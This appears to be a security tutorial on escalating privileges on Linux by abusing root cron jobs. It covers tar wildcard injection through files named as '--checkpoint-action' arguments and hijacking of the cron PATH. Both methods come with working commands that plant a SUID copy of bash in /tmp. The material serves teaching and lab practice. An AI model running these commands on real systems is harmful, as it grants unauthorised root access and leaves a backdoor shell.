Cron Jobs Part 2
Wildcard Injection
In Unix, a wildcard character can be used to represent one or more other characters. One example is the * character. The * character can represent zero or multiple characters in a string.
Bash does not support regular expressions like other programming languages and instead uses something “globbing” to match specific patterns. So instead of using regular expressions to run a command with some given pattern, bash will use wildcard characters to match file names and content.
Let me better illustrate this with an example:
When we run this command, we get a list of all files and directories in the current directory:
ls *Let’s create an arbitrary file called “-la” that is actually a command we want run:
touch '/home/user/files/-la'Note: this only works if you specify the entire file path.
When we run ls * to list all the files again, the “-la“ file will actually be interpreted as an argument. So now the files will be listed in long format along with any hidden file names:
Now that we understand the concept a little better, let’s try exploiting a cron job that’s running a script with a wildcard argument in it to elevate our privileges:
We first take a look at the /etc/crontab file and notice there is a script being run called /home/admin/scripts/backup.sh as root.
* * * * * root /home/admin/scripts/backup.shIf we view the script, we will notice there is a wildcard being used as an argument in the script:
To exploit this, we will run these commands in order:
# creating a program that copies /bin/bash over to /tmp and adds the SUID bit on itecho 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > \/home/user/files/pwn.sh# creates a file '--checkpoint=1' that will be interpreted as an argumenttouch /home/user/files/--checkpoint=1# creates a file '—checkpoint-action=exec=sh\ pwn.sh' that will be interpreted as an argumenttouch /home/user/files/--checkpoint-action=exec=sh\ pwn.sh
We wait for the cron job to run which will take less than a minute.
We now type in /tmp/bash -p and we should be running as root now.
root@debian:~#Redefining $PATH
The $PATH variable is an environment variable that specifies where executable programs are located. If you type in $PATH in a Unix machine, it will output the directories where various executables are stored:
root@kali:~# $PATHbash: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin: No such file or directory
When you type in a program to run, such as python, the system will read the $PATH variable directories from left to right to locate the executable. In this case, python is stored in /usr/bin/python so the $PATH variable was able to provide a directory that contained the executable. If the directory /usr/bin wasn’t in the $PATH variable, then the system wouldn’t know where to find the executable, and the user would need to specify the entire path in the shell to call the program.
Let’s go over an example on how to identify and exploit a misconfigured system cron tab.
First, we list out the contents of the /etc/crontab file and make note of two things: the $PATH variable that is set for the cron jobs, and any cron jobs running that may be of interest.
# path variablePATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin# cron job running a script called nothing.sh every minute as root* * * * * root nothing.sh
Notice how the $PATH variable has the /home/user directory listed before any other directory. This means the system will search that directory to run nothing.sh before any of the other directories. The system needs to search the $PATH variable for the location of the script because the full file path for nothing.sh was not specified in the cron job.
We will now run the following commands in order to exploit the misconfigured cron job:
# creating a program called nothing.sh that copies /bin/bash over to /tmp and adds the SUID bit on itecho 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > \/home/user/nothing.sh# change the permissions of the file so it’s executablechmod +x /home/user/nothing.sh# wait 1 minute for the cron job to run# executes the modified version of bash we created with the SUID bit/tmp/bash -p
If all went well, we should now be root!
root@debian:~#